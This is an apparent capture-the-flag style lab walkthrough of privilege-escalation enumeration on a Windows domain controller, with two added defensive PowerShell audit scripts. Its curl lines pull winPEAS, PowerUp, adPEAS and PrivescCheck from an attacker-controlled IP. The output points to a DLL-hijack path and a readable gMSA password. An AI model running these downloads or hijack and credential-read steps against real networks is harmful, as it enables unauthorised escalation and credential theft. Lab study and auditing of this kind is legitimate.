PEAS


Running automated enumeration on the dc01.heist.offsec (192.168.198.165) host after completing manual enumeration.

*Evil-WinRM* PS C:\tmp> curl http://192.168.45.176/winPEASany.exe -OutFile C:\tmp\winPEASany.exe

Delivery complete

Executing PEAS

ENV


╔══════════╣ User Environment Variables
╚ Check for some passwords or keys in the env variables 
    COMPUTERNAME: DC01
    PUBLIC: C:\Users\Public
    LOCALAPPDATA: C:\Users\enox\AppData\Local
    PSModulePath: C:\Users\enox\Documents\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules
    PROCESSOR_ARCHITECTURE: AMD64
    Path: C:\Program Files\Python39\Scripts\;C:\Program Files\Python39\;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\enox\AppData\Local\Microsoft\WindowsApps
    CommonProgramFiles(x86): C:\Program Files (x86)\Common Files
    ProgramFiles(x86): C:\Program Files (x86)
    PROCESSOR_LEVEL: 25
    ProgramFiles: C:\Program Files
    PATHEXT: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.PY;.PYW;.CPL
    USERPROFILE: C:\Users\enox
    SystemRoot: C:\Windows
    ALLUSERSPROFILE: C:\ProgramData
    DriverData: C:\Windows\System32\Drivers\DriverData
    ProgramData: C:\ProgramData
    PROCESSOR_REVISION: 0101
    USERNAME: enox
    CommonProgramW6432: C:\Program Files\Common Files
    CommonProgramFiles: C:\Program Files\Common Files
    OS: Windows_NT
    PROCESSOR_IDENTIFIER: AMD64 Family 25 Model 1 Stepping 1, AuthenticAMD
    ComSpec: C:\Windows\system32\cmd.exe
    SystemDrive: C:
    TEMP: C:\Users\enox\AppData\Local\Temp
    NUMBER_OF_PROCESSORS: 2
    APPDATA: C:\Users\enox\AppData\Roaming
    TMP: C:\Users\enox\AppData\Local\Temp
    ProgramW6432: C:\Program Files
    windir: C:\Windows
    USERDOMAIN: HEIST
    USERDNSDOMAIN: heist.offsec
 
╔══════════╣ System Environment Variables
╚ Check for some passwords or keys in the env variables 
    ComSpec: C:\Windows\system32\cmd.exe
    DriverData: C:\Windows\System32\Drivers\DriverData
    OS: Windows_NT
    Path: C:\Program Files\Python39\Scripts\;C:\Program Files\Python39\;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\
    PATHEXT: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.PY;.PYW
    PROCESSOR_ARCHITECTURE: AMD64
    PSModulePath: C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules
    TEMP: C:\Windows\TEMP
    TMP: C:\Windows\TEMP
    USERNAME: SYSTEM
    windir: C:\Windows
    NUMBER_OF_PROCESSORS: 2
    PROCESSOR_LEVEL: 25
    PROCESSOR_IDENTIFIER: AMD64 Family 25 Model 1 Stepping 1, AuthenticAMD
    PROCESSOR_REVISION: 0101

N/A


UAC


PowerShell


NTLM


Token Privileges (enox)


Enumerated

Services


PowerUp.ps1


*Evil-WinRM* PS C:\tmp> curl http://192.168.45.176/PowerUp.ps1 -OutFile C:\tmp\PowerUp.ps1

Delivery complete

*Evil-WinRM* PS C:\tmp> . .\PowerUp.ps1
*Evil-WinRM* PS C:\tmp> Invoke-AllChecks
Access denied 
 
ModifiablePath    : C:\Users\enox\AppData\Local\Microsoft\WindowsApps
IdentityReference : HEIST\enox
Permissions       : {WriteOwner, Delete, WriteAttributes, Synchronize...}
%PATH%            : C:\Users\enox\AppData\Local\Microsoft\WindowsApps
Name              : C:\Users\enox\AppData\Local\Microsoft\WindowsApps
Check             : %PATH% .dll Hijacks
AbuseFunction     : Write-HijackDll -DllPath 'C:\Users\enox\AppData\Local\Microsoft\WindowsApps\wlbsctrl.dll'

adPEAS


*Evil-WinRM* PS C:\tmp> curl http://192.168.45.176/adPEAS.ps1 -OutFile C:\tmp\adPEAS.ps1

Delivery complete

Executing adPEAS

Domain


Add-Computer


gMSA


The enox user is able to read the gMSA password of the svc_apache$ account.
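Added audit example for the finding above (my own code, not adPEAS's): for every gMSA in the domain it lists which principals may retrieve the managed password and expands groups, so an indirect grant to a user such as enox becomes visible. It assumes the ActiveDirectory RSAT module is available on the host where it runs.

```powershell
# Audit who can read each gMSA's managed password (added example, not adPEAS code).
# Assumes the ActiveDirectory module (RSAT) is installed and the host is domain-joined.
Import-Module ActiveDirectory

function Get-GmsaPasswordReaders {
    Get-ADServiceAccount -Filter * -Properties PrincipalsAllowedToRetrieveManagedPassword |
        ForEach-Object {
            $gmsa = $_
            # Each entry is the DN of a user, computer or group allowed to retrieve the password.
            foreach ($dn in $gmsa.PrincipalsAllowedToRetrieveManagedPassword) {
                $principal = Get-ADObject -Identity $dn -Properties sAMAccountName
                # Groups are expanded recursively so nested members show up; users and
                # computers are reported directly.
                $members = if ($principal.ObjectClass -eq 'group') {
                    Get-ADGroupMember -Identity $dn -Recursive | Select-Object -ExpandProperty SamAccountName
                } else {
                    $principal.sAMAccountName
                }
                [pscustomobject]@{
                    gMSA      = $gmsa.SamAccountName      # e.g. svc_apache$
                    Principal = $principal.Name
                    Type      = $principal.ObjectClass
                    Members   = ($members -join ', ')
                }
            }
        }
}

# The expected grant is to the computer account(s) hosting the service; anything
# else (a user, or a group containing users) is what this finding is about.
Get-GmsaPasswordReaders | Where-Object { $_.Type -ne 'computer' } | Format-Table -AutoSize
```

Remediation is to narrow PrincipalsAllowedToRetrieveManagedPassword with Set-ADServiceAccount to the host computer accounts only.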

Interesting


svc_apache$ is DC?

BloodHound


*Evil-WinRM* PS C:\tmp> ls *.zip
 
    Directory: C:\tmp
 
 
Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----         7/7/2025   8:12 AM          11391 heist.offsec_20250707081211_BloodHound.zip

Ingestion complete.

PrivescCheck


*Evil-WinRM* PS C:\tmp> curl http://192.168.45.176/PrivescCheck.ps1 -OutFile C:\tmp\PrivescCheck.ps1

Delivery complete

*Evil-WinRM* PS C:\tmp> . .\PrivescCheck.ps1
*Evil-WinRM* PS C:\tmp> Invoke-PrivescCheck

Executing PrivescCheck

Services


┏━━━━━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┓
┃ CATEGORY ┃ TA0004 - Privilege Escalation                     ┃
┃ NAME     ┃ Service list (non-default)                        ┃
┃ TYPE     ┃ Base                                              ┃
┣━━━━━━━━━━┻━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┫
┃ Get information about third-party services. It does so by    ┃
┃ parsing the target executable's metadata and checking        ┃
┃ whether the publisher is Microsoft.                          ┃
┗━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┛
 
 
Name        : FlaskService
DisplayName : FlaskService
ImagePath   : C:\Program Files\nssm-2.24\win64\nssm.exe
User        : HEIST\enox
StartMode   : Automatic
 
Name        : ssh-agent
DisplayName : OpenSSH Authentication Agent
ImagePath   : C:\Windows\System32\OpenSSH\ssh-agent.exe
User        : LocalSystem
StartMode   : Disabled
 
Name        : VGAuthService
DisplayName : VMware Alias Manager and Ticket Service
ImagePath   : "C:\Program Files\VMware\VMware Tools\VMware VGAuth\VGAuthService.exe"
User        : LocalSystem
StartMode   : Automatic
 
Name        : VM3DService
DisplayName : @oem3.inf,%VM3DSERVICE_DISPLAYNAME%;VMware SVGA Helper Service
ImagePath   : C:\Windows\system32\vm3dservice.exe
User        : LocalSystem
StartMode   : Automatic
 
Name        : VMTools
DisplayName : VMware Tools
ImagePath   : "C:\Program Files\VMware\VMware Tools\vmtoolsd.exe"
User        : LocalSystem
StartMode   : Automatic
 
 
 
[*] Status: Informational - Severity: None - Execution time: 00:00:01.441
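The check described in the box above (non-Microsoft publisher in the binary's version metadata) as an added example in my own code, not PrivescCheck's; it also flags services running as a domain user, which is what makes FlaskService stand out in the output above.

```powershell
# List services whose executable is not published by Microsoft (added example, not PrivescCheck code).
function Get-NonMicrosoftService {
    Get-CimInstance -ClassName Win32_Service | ForEach-Object {
        $svc = $_
        if (-not $svc.PathName) { return }
        # ImagePath may be quoted and carry arguments; keep only the executable.
        # An unquoted path with spaces falls through to its first token, so such
        # entries should be reviewed by hand as well.
        $exe = if ($svc.PathName -match '^"([^"]+)"') { $Matches[1] }
               else { ($svc.PathName -split '\s+')[0] }
        $exe = [Environment]::ExpandEnvironmentVariables($exe)
        if (-not (Test-Path -LiteralPath $exe)) { return }
        # Read the PE version resource; Microsoft binaries carry "Microsoft Corporation".
        $company = (Get-Item -LiteralPath $exe).VersionInfo.CompanyName
        if ($company -and $company -match 'Microsoft') { return }
        [pscustomobject]@{
            Name      = $svc.Name
            ImagePath = $exe
            Company   = $company
            User      = $svc.StartName
            StartMode = $svc.StartMode
            # A third-party service running as a regular domain account (FlaskService
            # under HEIST\enox above) rather than a built-in service identity.
            RunsAsDomainUser = ($svc.StartName -notmatch '^(LocalSystem|NT AUTHORITY\\|NT SERVICE\\)$|^(NT AUTHORITY|NT SERVICE)\\')
        }
    }
}

Get-NonMicrosoftService | Sort-Object RunsAsDomainUser -Descending | Format-Table -AutoSize
```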

FlaskService

LSA Protection


Credential Guard


LAPS